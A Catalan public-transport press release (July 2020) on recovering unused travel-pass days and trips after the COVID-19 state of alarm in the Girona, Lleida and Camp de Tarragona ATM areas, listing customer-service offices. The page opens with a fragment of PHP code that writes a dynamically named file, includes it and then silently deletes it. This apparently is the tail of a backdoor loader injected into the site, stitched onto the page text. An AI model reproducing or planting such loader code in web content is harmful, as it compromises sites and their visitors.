");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> S'inicia la compensació de títols de transport no consumits durant l'estat d'alarma a les ATM Àrea de Girona, Àrea de Lleida i Camp de Tarragona
Iconos cabecera

Destaquem

  • SEM 2021SEM 2021
    Setmana Europea de la Mobilitat 2021

S'inicia la compensació de títols de transport no consumits durant l'estat d'alarma a les ATM Àrea de Girona, Àrea de Lleida i Camp de Tarragona (07/07/2020)

Els usuaris que per l’inici de l’estat d’alarma, establert pel Real Decret 463/2020 per la gestió de la situació de crisis sanitària ocasionada per la COVID-19, no van acabar de consumir el seu títol de transport de les ATM Àrea de Girona, Àrea de Lleida o Camp de Tarragona amb caducitat temporal (T-MES, T-50/30, T-10/30 o T-70/90 FM/FN) podran recuperar els viatges i els dies de validesa que mancaven, a partir del 10 de juliol i fins el 31 de març de 2021.

Per fer-ho, els usuaris poden anar a qualsevol dels Centres d’Atenció al Client de la seva ATM territorial (CAC) amb la targeta ATM que utilitzaven en el moment d’iniciar-se el confinament. Mentre no ho facin, poden seguir utilitzant la targeta amb normalitat i quan s’exhaureixi el títol de transport ATM actualment actiu, o quan més li convingui fins a final d’any, desplaçar-se al seu CAC més proper.

Un cop s’identifiqui, mitjançant la lectura del bitllet, que l’usuari tenia un títol de transport ATM amb caducitat temporal (T-MES, T-50/30, T-10/30 o T-70/90 FM/FN) actiu (començat però no caducat) entre els dies 13 i 20 de març, ambdós inclosos, s’allargarà la validesa del darrer títol temporal carregat a la targeta. Aquesta validesa s’allargarà amb el número de dies transcorreguts entre el 13 de març i la data de caducitat del títol però s’afegirà a més una bonificació de 4 dies amb l’objectiu que la persona pugui reorganitzar els seus desplaçaments.

La recuperació de viatges no consumits i de dies de validesa s’aplicarà a partir del dia que l’usuari faci el tràmit al Centre d’Atenció al Client de l’ATM (CAC) per recuperar el seu títol. Com que es tracta d’un títol temporal, els dies afegits comencen a comptar a partir d’aquell moment.

Si pel motiu que sigui, l’usuari no necessita ara aquells viatges, sinó que els necessita per més endavant (per exemple quan es reprengui l’activitat acadèmica a escoles, instituts i universitats), recomanem que no vagi ara a recuperar-los, ja que cada dia que passi, serà un dia menys per poder-los utilitzar. Millor fer la gestió al CAC quan els necessiti, tenint en compte que hi ha fins el 31 de març de 2021 per anar a recuperar-los.

Pel que fa als títols de transport ATM no temporals (T-10 i T-12) i als títols amb caducitat temporal pendents d’estrenar en el moment d’inici de l’estat d’alarma, no cal que es faci res perquè no caduquen fins el proper canvi de tarifes i es poden activar o continuar utilitzant amb normalitat després de la finalització de l’estat d’alarma.

Els Centres d’Atenció al Client de l’ATM (CAC) són els següents:
ATM Àrea de Girona
• Girona: CAC Estació d’autobusos de Girona, Plaça de Espanya s/n.
• Girona: Oficina d’Atenció Ciutadana de l’Edifici de la Generalitat a Girona, Plaça Pompeu Fabra 1 (obligatori cita prèvia).

ATM Àrea de Lleida
• Lleida: CAC Autobusos de Lleida, Pl. Espanya, 1 (entrada per Av. de Madrid, baixos).
• Bellpuig: Ajuntament de Bellpuig, Pl. Homenatge de la Vellesa, 6.
• Cervera: Ajuntament de Cervera, Pl. Major, 1.
• Mollerussa: Ajuntament de Mollerussa, Pl. Ajuntament, 2.
• Tàrrega: Ajuntament de Tàrrega, Pl. Major, 1.

ATM Camp de Tarragona
• Tarragona: CAC EMT Estació d’autobusos de Tarragona, Carrer Pere Martell, 1.
• Tarragona: CAC EMT Soler, Carrer Soler, 4.
• Tarragona: Oficina d’Atenció Ciutadana del Departament de Territori i Sostenibilitat de la Generalitat de Catalunya a Tarragona, Carrer Anselm Clavé, 1 (obligatori cita prèvia).
• Montblanc: Consell Comarcal de la Conca de Barberà, Carrer Sant Josep, 18 (obligatori cita prèvia).

Nota de premsa definitiva (48 kB)

S'inicia la compensació de títols de transport no consumits durant l'estat d'alarma a les ATM Àrea de Girona, Àrea de Lleida i Camp de Tarragona

[Tornar a Notícies]

 
Carrer d' Anselm Clavé, 1 43004 - Tarragona